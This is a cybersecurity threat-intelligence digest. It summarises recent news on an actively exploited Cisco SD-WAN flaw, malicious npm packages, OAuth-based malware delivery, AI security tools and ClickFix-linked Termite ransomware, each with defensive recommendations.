📋 Top Headlines at a Glance

1. SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 87
2. Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited
3. Week in review: Weaponized OAuth redirection logic delivers malware, Patch Tuesday forecast
4. OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues
5. Termite ransomware breaches linked to ClickFix CastleRAT attacks

   Executive Summary: Today's intelligence highlights a critical and immediate threat: active exploitation of a Cisco Catalyst SD-WAN vulnerability, demanding urgent patching. Concurrently, the landscape reveals sophisticated malware campaigns leveraging supply chain vectors like npm packages and novel techniques such as OAuth redirection. On the defensive front, AI-powered security tools are emerging, demonstrating significant potential in vulnerability detection and penetration testing. Organizations must prioritize patching, enhance supply chain vigilance, and strategically evaluate AI integration to counter persistent ransomware and evolving attack methodologies.

🌍 Technical Intelligence Breakdown

📰 SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 87

This newsletter compilation provides insights into various malware-related activities and research. Key points include:

• Supply Chain Compromise: The StegaBin campaign involves 26 malicious npm Packages that utilize Pastebin steganography to deploy a multi-stage credential stealer. This highlights the ongoing risk within software supply chains.
• Browser-Based Threats: A new threat involves a fake Google security check that functions as a browser RAT (Remote Access Trojan), indicating continued social engineering and web-based attack vectors.
• Emerging Malware: The newsletter also references SloppyLemming, suggesting new or notable malware activity. Dataset provides limited detail on SloppyLemming, but its inclusion signals a new threat to monitor.
• Defensive Action: Organizations should implement strict supply chain security measures, including vetting npm dependencies, and educate users about phishing attempts disguised as security checks.

⚠️ Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited

A significant vulnerability, identified as CVE-2026-20127, affecting Cisco Catalyst SD-WAN is now being actively exploited in the wild.

• Exploitation Status: Reports from WatchTowr confirm widespread exploitation attempts originating from numerous unique IP addresses.
• Attack Path: Unknown actor → Exploits CVE-2026-20127 → Compromises Cisco Catalyst SD-WAN infrastructure.
• Criticality: Active exploitation of network infrastructure components like SD-WAN solutions poses a severe risk to network integrity and data confidentiality.
• Defensive Action: Immediate patching of all Cisco Catalyst SD-WAN deployments is paramount. Organizations should also monitor network logs for indicators of compromise related to CVE-2026-20127 and implement network segmentation to limit potential lateral movement.

🗓️ Week in review: Weaponized OAuth redirection logic delivers malware, Patch Tuesday forecast

This weekly review covers several important security developments:

• Malware Delivery: Attackers are weaponizing OAuth redirection logic to deliver malware, indicating a sophisticated method to bypass traditional security controls by abusing legitimate authentication flows.
• AI in Penetration Testing: The introduction of BlacksmithAI, an open-source AI-powered penetration testing framework, demonstrates the growing integration of AI into offensive security operations. This framework uses multiple AI agents coordinated by an orchestrator for various assessment stages.
• Security Debt: The increasing issue of security debt is highlighted as a growing governance concern for CISOs, with application security backlogs expanding across large development environments.
• Defensive Action: Review OAuth implementations for redirection vulnerabilities. Evaluate the implications of AI-powered pentesting tools for both defensive and offensive strategies. Address security debt proactively through secure development lifecycle (SDLC) integration and prioritization.

🤖 OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues

OpenAI has launched Codex Security, an AI-powered security agent designed to identify, validate, and propose fixes for vulnerabilities within codebases.

• Capabilities: Codex Security can build deep context about a project to pinpoint vulnerabilities.
• Impact: In a recent scan, the tool analyzed 1.2 million commits and identified 10,561 high-severity issues, showcasing the potential of AI in large-scale code security analysis.
• Availability: The feature is currently in a research preview for ChatGPT Pro, Enterprise, Business, and Edu customers via the Codex web, with free usage for a limited period.
• Strategic Implication: This development signifies a major step towards automating vulnerability management and shifting security left in the development pipeline.
• Defensive Action: Organizations should explore integrating AI-powered code analysis tools like Codex Security into their development workflows to enhance vulnerability detection and remediation efforts.

💥 Termite ransomware breaches linked to ClickFix CastleRAT attacks

Ransomware operations attributed to the threat actor Velvet Tempest are now linked to attacks involving the ClickFix technique and the CastleRAT backdoor.

• Attack Chain: Velvet Tempest actors are deploying DonutLoader malware and the CastleRAT backdoor by leveraging the ClickFix technique, often utilizing legitimate Windows utilities to evade detection.
• Malware Families: The primary ransomware observed is Termite ransomware.
• Tactics, Techniques, and Procedures (TTPs): The use of legitimate Windows utilities is a common tactic to blend in with normal system activity and bypass security controls.
• Defensive Action: Implement robust endpoint detection and response (EDR) solutions, enforce application whitelisting to prevent execution of unauthorized utilities, and conduct regular security awareness training to mitigate ClickFix and similar social engineering techniques. Monitor for unusual activity involving legitimate system tools.

📉 Threat Landscape & Trends

• Active Exploitation: Critical vulnerabilities in widely used network infrastructure, such as Cisco Catalyst SD-WAN, are being actively exploited, necessitating immediate patching and robust incident response capabilities.
• Sophisticated Malware Delivery: Attackers are increasingly leveraging advanced techniques like steganography within npm packages and abusing OAuth redirection logic to deliver malware, highlighting the need for enhanced supply chain and application security.
• AI in Security: Artificial intelligence is rapidly advancing on both sides of the security spectrum. BlacksmithAI demonstrates AI's role in offensive penetration testing, while OpenAI Codex Security showcases its potential for large-scale, automated vulnerability detection and remediation.
• Persistent Ransomware: Ransomware groups like Velvet Tempest continue to evolve their TTPs, employing legitimate tools and novel techniques (ClickFix) to deploy payloads like Termite ransomware and backdoors such as CastleRAT.
• Security Debt as a Governance Issue: The growing backlog of application security issues is becoming a critical governance challenge for CISOs, impacting overall organizational risk posture.

📌 Strategic Takeaway

Organizations must adopt a proactive and multi-layered defense strategy, prioritizing immediate patching of known exploited vulnerabilities, strengthening supply chain security, and strategically integrating AI-powered tools to augment human analysts in both offensive and defensive security operations, all while addressing accumulating security debt as a critical governance imperative.

🔗 References

1. SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 87
2. Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited
3. Week in review: Weaponized OAuth redirection logic delivers malware, Patch Tuesday forecast
4. OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues
5. Termite ransomware breaches linked to ClickFix CastleRAT attacks